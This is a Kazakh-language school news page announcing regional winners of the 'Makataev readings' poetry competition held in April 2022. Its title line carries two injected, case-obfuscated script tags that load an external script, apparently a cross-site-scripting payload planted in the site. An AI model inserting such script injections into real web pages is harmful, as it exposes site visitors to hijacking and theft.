«Мақатаев оқулары» Республикалық байқауының қорытынды кезеңінің қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.04.2022

2022 жылдың 15 сәуірінде Алматы облысы, Райымбек ауданы, Қарасаз ауылында облыстық кезеңдердің жеңімпаздары 7-11 сынып оқушылары арасында «Мақатаев оқулары» Республикалық байқауының қорытынды кезеңі өтті.

Байқау қорытындысы бойынша жас дарынды Ақмолалық оқушылар ІІІ дәрежелі дипломмен және грамоталармен марапатталды:

1. 1-бағыт  бойынша «Айтып өткен ақында арман бар ма Алматы облысы білім басқармасы басшысының Алғыс хатымен - Аршалы ауданы бойынша білім бөлімі Сарыоба ауылының № 2 жалпы орта білім беретін мектебінің 8 сынып оқушысы Батыржанұлы Сәкен марапатталды;

2. 2-бағыт бойынша «Жыр эстафетасы» Алматы облысы білім басқармасы басшысының Алғыс хатымен - Степногорск қаласы, дарынды балаларға арналған № 4 облыстық мамандандырылған «Болашақ» мектеп-интернатының 10 сынып оқушысы Сағайқызы Дильназ марапатталды;

3. 3-бағыт бойынша «Көкірегімде жыр сәулесі маздайды...» «Мақатаев оқулары» Республикалық байқауының ІІІ дәрежелі дипломымен Аршалы ауданы бойынша білім бөлімі Сарыоба ауылының № 2 жалпы орта білім беретін мектебінің 8 сынып оқушысы Серік Ақтілек марапатталды.

Біздің жас және талантты жерлестерімізді шын жүректен құттықтаймыз және оларға жаңа шығармашылық жеңістер тілейміз!!!

  

 

Просмотров: 411


Пікір қосу



Деректерді қолтаңбаға қосу